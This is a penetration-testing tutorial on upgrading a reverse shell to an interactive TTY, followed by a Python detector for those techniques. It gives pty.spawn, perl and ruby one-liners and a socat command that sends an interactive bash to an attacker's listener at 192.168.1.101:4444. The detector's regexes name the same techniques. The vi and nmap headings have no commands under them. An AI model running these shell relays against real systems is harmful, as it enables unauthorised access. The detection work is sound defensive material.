Spawning a TTY Shell
How to get an interactive shell or TTY shell
During a penetration test, for example, you might find a vulnerable web application and get a reverse shell back to your machine. Usually the shell you receive is owned by the user of the running service, such as "www-data" or similar. This kind of user is not meant to have a shell, because it does not need to interact with the operating system the way a human does.
Some commands (such as less, vi, su, sudo, passwd, etc.) do not work in a non-TTY, non-interactive shell. For that reason, you need to upgrade your shell to a TTY shell.
To check whether the shell is a TTY shell, just run the tty command, as in the following:
$ tty
not a tty

$ tty
/dev/pts/0
Here are some commands that will let you spawn a TTY shell:
This is the most popular method for spawning a TTY shell. The target server needs python or python3 installed.
python -c "import pty;pty.spawn('/bin/bash')"
perl -e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh"'
From within vi:
From within nmap:
Socat is like netcat on steroids: a very powerful networking Swiss-army knife. It can be used to transfer full TTYs over TCP connections.
Note: Socat is not installed by default, so you may need to compile the binary yourself or download a socat binary from the following links:
On your machine (the attacker machine), start a Socat listener:
socat -,raw,echo=0 tcp-listen:4444
On the victim machine, run the following:
socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:192.168.1.101:4444
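From the defender's side, the commands above are also a useful detection signature: a service account such as www-data should never be running pty.spawn, a perl/ruby exec wrapper, or a socat pty relay. The following is an added example (not from the original page) that scans constructed ps output for exactly those patterns; the service-account list and regexes are assumptions to tune per environment.

```python
import re

# Constructed sample of `ps -eo user,pid,args` output, not taken from any real host.
SAMPLE_PS = """\
USER       PID ARGS
root         1 /sbin/init
www-data  1337 /bin/sh -c python3 -c "import pty;pty.spawn('/bin/bash')"
www-data  1340 /bin/bash
www-data  1402 socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:192.168.1.101:4444
postgres  2210 postgres: checkpointer
alice     3001 python3 -c "import pty;pty.spawn('/bin/bash')"
www-data  3102 perl -e 'exec "/bin/sh";'
"""

# Assumed list of accounts that run daemons and should never drive an interactive shell.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "postgres", "mysql", "nobody"}

# Command-line fragments matching the TTY-upgrade techniques listed on this page.
TTY_UPGRADE_PATTERNS = {
    "python pty.spawn": re.compile(r"import\s+pty\s*;\s*pty\.spawn\("),
    "perl exec shell":  re.compile(r"perl\s+-e\s+['\"]exec\s+['\"]/bin/(ba)?sh"),
    "ruby exec shell":  re.compile(r"ruby\s+-e\s+['\"]exec\s+['\"]/bin/(ba)?sh"),
    "socat pty relay":  re.compile(r"socat\s+exec:.*\bpty\b.*tcp:"),
}

def parse_ps(text):
    """Yield (user, pid, args) tuples from `ps -eo user,pid,args`-style output."""
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 2)
        if len(parts) == 3:
            yield parts[0], int(parts[1]), parts[2]

def find_tty_upgrades(ps_text, service_accounts=SERVICE_ACCOUNTS):
    """Return one alert per service-account process running a known TTY-upgrade command."""
    alerts = []
    for user, pid, args in parse_ps(ps_text):
        if user not in service_accounts:
            continue                              # interactive users are expected to have a TTY
        for name, pattern in TTY_UPGRADE_PATTERNS.items():
            if pattern.search(args):
                alerts.append({"user": user, "pid": pid, "technique": name})
                break                             # one alert per process is enough
    return alerts

if __name__ == "__main__":
    for alert in find_tty_upgrades(SAMPLE_PS):
        print(f"ALERT pid={alert['pid']} user={alert['user']} technique={alert['technique']}")
```

In practice the same patterns belong in an auditd execve rule or an EDR process-creation query rather than a periodic ps scan, which a short-lived process can slip past.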